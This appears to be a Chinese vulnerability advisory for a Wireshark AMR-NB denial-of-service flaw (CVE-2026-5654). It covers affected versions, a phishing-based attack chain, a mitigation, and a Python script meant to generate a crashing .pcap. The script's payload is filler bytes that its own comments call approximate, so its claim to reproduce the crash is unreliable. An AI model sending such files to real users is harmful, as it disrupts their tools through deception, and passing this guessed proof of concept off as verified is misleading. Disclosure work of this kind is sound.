CVE-2026-5654 CVSS 5.5 中危

CVE-2026-5654 Wireshark AMR-NB编解码器拒绝服务漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5654

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

Wireshark是一款广泛使用的网络协议分析工具。在其4.6.0至4.6.4和4.4.0至4.4.14版本中，AMR-NB编解码器组件存在安全缺陷。攻击者可诱导用户打开包含恶意构造数据包的捕获文件，触发解析器崩溃，从而导致拒绝服务。该漏洞需用户交互，主要影响软件可用性，不涉及数据泄露。

技术细节

该漏洞源于Wireshark在解析AMR-NB（自适应多速率窄带）音频编解码数据时的逻辑错误。具体而言，解析器在处理特制的畸形数据包字段时，未能正确进行边界检查或空指针引用，导致内存访问违规。由于CVSS向量为AV:L/AC:L/PR:N/UI:R，攻击通常需要本地访问权限或通过社会工程学手段诱导受害者打开恶意.pcap文件。一旦Wireshark尝试解码该恶意数据包，解析进程将异常终止，造成应用崩溃。尽管此漏洞不危及机密性或完整性，但在关键网络监控环境中可能导致服务中断。

攻击链分析

STEP 1

步骤1：制作恶意文件

攻击者构造包含特定畸形AMR-NB数据包的.pcap文件。

STEP 2

步骤2：投递恶意文件

通过网络钓鱼或其他社会工程学手段，诱导受害者下载并保存该文件。

STEP 3

步骤3：触发漏洞

受害者使用存在漏洞的Wireshark版本打开该文件进行协议分析。

STEP 4

步骤4：拒绝服务

Wireshark的AMR-NB解析器处理异常数据时崩溃，应用程序终止，导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-5654 (Wireshark AMR-NB Crash)
# This script creates a malicious packet designed to trigger the crash.
# Usage: python3 poc.py -> Open cve_2026_5654.pcap with vulnerable Wireshark

from scapy.all import Ether, IP, UDP, Raw, wrpcap
import sys

def generate_malicious_pcap(filename="cve_2026_5654.pcap"):
    # Construct a basic packet frame
    # AMR-NB often runs over RTP/UDP, but the dissectors handle Raw input
    pkt = Ether() / IP(dst="127.0.0.1") / UDP(sport=1234, dport=5678)
    
    # Malicious payload targeting the AMR-NB codec parser
    # This payload simulates a malformed frame header that triggers the bug.
    # Exact bytes may vary based on specific dissection logic.
    # 0x3C is a common AMR-NB payload header byte, followed by garbage data
    malicious_payload = b"\x3c" + b"\x00" * 10 + b"\xff" * 50
    
    pkt = pkt / Raw(load=malicious_payload)
    
    # Write the packet to a pcap file
    wrpcap(filename, [pkt])
    print(f"[+] PoC file generated: {filename}")
    print(f"[+] Open this file in Wireshark 4.4.0 - 4.4.14 or 4.6.0 - 4.6.4 to reproduce the crash.")

if __name__ == "__main__":
    generate_malicious_pcap()

影响范围

Wireshark 4.6.0 to 4.6.4

Wireshark 4.4.0 to 4.4.14

防御指南

临时缓解措施

如果无法立即升级，建议在Wireshark的“分析首选项”中禁用AMR-NB协议解析器（通过Enabled Protocols搜索AMR并取消勾选），以此作为临时缓解措施防止漏洞被触发。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表